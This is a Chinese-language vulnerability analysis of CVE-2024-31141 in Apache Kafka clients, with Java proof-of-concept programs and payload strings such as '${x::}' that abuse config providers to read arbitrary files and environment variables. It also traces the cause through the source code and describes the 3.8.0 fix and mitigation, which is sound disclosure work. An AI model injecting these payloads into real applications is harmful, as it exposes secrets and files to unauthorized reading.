CVE-2024-31141 Apache Kafka Clients:Privilege escalation to filesystem read-access via automatic ConfigProvider

CVE-2024-31141: Apache Kafka Clients: Privilege escalation to filesystem read-access via automatic ConfigProvider

漏洞简介

Apache Kafka 客户端接受配置数据以自定义行为,并包含 ConfigProvider 插件以操作这些配置。 Apache Kafka 还提供 FileConfigProvider、DirectoryConfigProvider 和 EnvVarConfigProvider 实现,其中包括从磁盘或环境变量读取的功能。在 Apache Kafka 客户端配置可以由不受信任方指定的应用程序中,攻击者可以使用这些 ConfigProvider 读取磁盘和环境变量的任意内容。

此问题影响 Apache Kafka 客户端:从 2.3.0 到 3.5.2、3.6.2、3.7.0。

漏洞复现

根目录下创建1.properties文件

然后配置客户端连接的配置项,在真实场景下存在于kafka客户端可控自定义配置的场景

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
package org.example;

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.common.config.provider.FileConfigProvider;

import java.util.Properties;

public class Test {
public static void main(String[] args) {
Properties providers = new Properties();
providers.put("bootstrap.servers", "localhost:9092");
providers.put("key.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("config.providers", "x");
providers.put("config.providers.x.class", FileConfigProvider.class.getName());
providers.put("test", "${x:/1.properties:password}");
Producer<String, String> producer = new KafkaProducer<>(providers);
producer.initTransactions();
}
}

可以看到这里成功读取properties文件内容,存入到对象中,在后续处理或日志处理中可能会泄露出来

类似的还可以获取环境变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
package org.example;

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.common.config.provider.EnvVarConfigProvider;

import java.util.Properties;

public class EnvVarConfigProviderTest {
public static void main(String[] args) {
Properties providers = new Properties();
providers.put("bootstrap.servers", "localhost:9092");
providers.put("key.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("config.providers", "x");
providers.put("config.providers.x.class", EnvVarConfigProvider.class.getName());
providers.put("test", "${x::USERDOMAIN_ROAMINGPROFILE}");
Producer<String, String> producer = new KafkaProducer<>(providers);
producer.initTransactions();
}
}

DirectoryConfigProvider本以为是可以列目录,结果是文件读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
package org.example;

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.common.config.provider.DirectoryConfigProvider;

import java.util.Properties;

public class DirectoryConfigProviderTest {
public static void main(String[] args) {
Properties providers = new Properties();
providers.put("bootstrap.servers", "localhost:9092");
providers.put("key.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("config.providers", "x");
providers.put("config.providers.x.class", DirectoryConfigProvider.class.getName());
providers.put("test", "${x:/:1.properties}");
Producer<String, String> producer = new KafkaProducer<>(providers);
producer.initTransactions();
}
}

漏洞分析

kafka/clients/src/main/java/org/apache/kafka/common/config/AbstractConfig.java at trunk · apache/kafka

根据漏洞通告可以发现和org.apache.kafka.automatic.config.providers有关

在github的apache kafka仓库可以搜索到相关代码

跟踪AUTOMATIC_CONFIG_PROVIDERS_PROPERTY,可以在这个附近找到很多的代码

kafka/clients/src/test/java/org/apache/kafka/common/config/AbstractConfigTest.java at trunk · apache/kafka

他们似乎都使用了${a:b:c}的格式在读取配置项,因为很多文件路径形式

继续根据通告中所说的Apache Kafka also provides FileConfigProvider, DirectoryConfigProvider, and EnvVarConfigProvider implementations which include the ability to read from disk or environment variables.

结合源码看看实现

org.apache.kafka.common.config.provider.FileConfigProvider#get(java.lang.String, java.util.Set<java.lang.String>)可以发现文件读取的位置

给这个类的函数加上断点调试

可以发现在实例化解析配置项过程中调用org.apache.kafka.common.config.AbstractConfig#instantiateConfigProviders解析configProvider的内容

这里会调用provider.configure方法,这里provider的类名指向FileConfigProvider

于是调用到org.apache.kafka.common.config.provider.FileConfigProvider#configure无事发生,继续调试,可以发现调用了org.apache.kafka.common.config.ConfigTransformer#transform来解析不是直接的变量,

可以发现满足这个正则匹配即可进行解析\$\{([^}]*?):(([^}]*?):)?([^}]*?)\}

${a:b:c}被解析为了providerNamepathvariable

调试到这里可以发现,调用到了文件读取的地方

类似的,获取环境变量这里主要分析org.apache.kafka.common.config.provider.EnvVarConfigProvider#get(java.lang.String, java.util.Set<java.lang.String>)

1
2
3
4
5
6
7
8
9
10
11
12
public ConfigData get(String path, Set<String> keys) {
if (path != null && !path.isEmpty()) {
log.error("Path is not supported for EnvVarConfigProvider, invalid value '{}'", path);
throw new ConfigException("Path is not supported for EnvVarConfigProvider, invalid value '" + path + "'");
} else if (keys == null) {
return new ConfigData(this.filteredEnvVarMap);
} else {
Map<String, String> filteredData = new HashMap(this.filteredEnvVarMap);
filteredData.keySet().retainAll(keys);
return new ConfigData(filteredData);
}
}

·根据这段代码逻辑可以看出,path要为空不然会报错退出,而keys不为空时则根据keys从环境变量中查找对应的环境变量,如果keys为空则返回所有环境变量,于是可以构造payload为${x::key_name}或者${x::}

顺便提一嘴,这里EnvVarConfigProvider#configure方法和FileConfigProvider#configure倒是不太一样

1
2
3
4
5
6
7
8
9
10
11
12
13
public void configure(Map<String, ?> configs) {
Pattern envVarPattern;
if (configs.containsKey("allowlist.pattern")) {
envVarPattern = Pattern.compile(String.valueOf(configs.get("allowlist.pattern")));
} else {
envVarPattern = Pattern.compile(".*");
log.info("No pattern for environment variables provided. Using default pattern '(.*)'.");
}

this.filteredEnvVarMap = (Map)this.envVarMap.entrySet().stream().filter((envVar) -> {
return envVarPattern.matcher((CharSequence)envVar.getKey()).matches();
}).collect(Collectors.toMap(Map.Entry::getKey, Map.Entry::getValue));
}

可以用来限制允许获取的环境变量

继续分析org.apache.kafka.common.config.provider.DirectoryConfigProvider#get(java.lang.String, java.util.function.Predicate<java.nio.file.Path>)可以发现这个感觉更厉害,经过调试加尝试可以发现${a:b:c}的格式被解析为${providerName:path:filename},并且可以读取任意文件内容,而不是局限于类似properties文件的键值对内容

跟踪到org.apache.kafka.common.config.provider.DirectoryConfigProvider#read方法即可发现文件读取

漏洞修复

在3.8.0版本中在configure方法处加了白名单限制

1
2
3
public void configure(Map<String, ?> configs) {
allowedPaths = new AllowedPaths((String) configs.getOrDefault(ALLOWED_PATHS_CONFIG, null));
}

建议使用受影响应用程序的用户将kafka客户端升级到版本>=3.8.0,并设置JVM系统属 性org.apache.kafka.automatic.config providers=none

后记

感觉直接漏洞利用难度还是很苛刻的,就看怎么泄露出存入的配置信息了

⬆︎TOP